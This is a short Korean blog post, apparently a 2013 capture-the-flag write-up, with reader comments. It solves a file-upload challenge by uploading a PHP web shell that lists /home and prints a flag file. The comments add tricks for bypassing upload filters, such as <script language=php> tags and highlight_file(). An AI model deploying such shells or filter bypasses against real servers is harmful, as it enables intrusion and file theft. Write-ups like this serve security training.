300점 치고는 너무 쉬운 문제였다.


그냥 php 쉘파일 업로드해서 확인하면 된다.


아래와 같은 파일을 업로드한다.

<?
    system("ls -al /home/");
    system("cat /home/[???? 기억이 안남]/flags");
?>
<br/>
<br/>
<br/>
<br/>
...


그 후에, 

./uploads/[ip encoding]/파일이름

로 접근하면 끝.

posted by tunz
  • ??? 2013.05.27 23:22

    저도 저 방식으로 접근했는데 왜 안됬는지... ㅜㅜ

    주소창에 주소:포트/uploads/아이피인커더/shell.php


    이렇게 시도했는데 말이죠...ㅜㅜ

    • tunz 2013.05.28 10:28 신고

      아이피가 public ip여야 합니다.
      ipconfig을 쳐서 나오는 아이피가 아니고
      네이버나 어느 홈페이지에서 내 ip 보기를 했을때 나오는 아이피로 해야합니다.

      이것때문에 그런게 아닐까요

    • ??? 2013.05.28 20:20

      외부 아이피를 사용했습니다
      주소를 어떻게하셧는지 알수있을까요

    • tunz 2013.05.28 23:36 신고

      음... 그냥 ip주소를 md5 했었는데...
      왜그럴까요

  • ??? 2013.05.27 23:22

    저도 저 방식으로 접근했는데 왜 안됬는지... ㅜㅜ

    주소창에 주소:포트/uploads/아이피인커더/shell.php


    이렇게 시도했는데 말이죠...ㅜㅜ

  • ??? 2013.05.29 13:05

    뭔가 제가 말도안되는 실수를 했던지,
    아니면 문제 외부적 요인에 문제가 있었나봅니다 ㅜㅜ

    수고하시구 답해주셔서 감사합니다 ㅎㅎ

  • rubiya 2013.06.16 01:35

    저희팀이 풀때는 <? 와 system 등등 여러 필터링이 있어서 <script language=php> , highlight_file() 이런식으로 필터링을 우회해가면서 풀었는데 이게 어찌된 영문인지 모르겠네요ㅠㅠ

    • tunz 2013.06.17 17:31 신고

      어라 ... 필터링 될때 어떤 문구가 뜨나요???
      전 처음에 올릴땐 안올라가길래, 파일이 너무 작은가 해서
      뒤에 <br/>을 엄청나게 붙이고 다시 올리니까 됐던 기억이 나네요.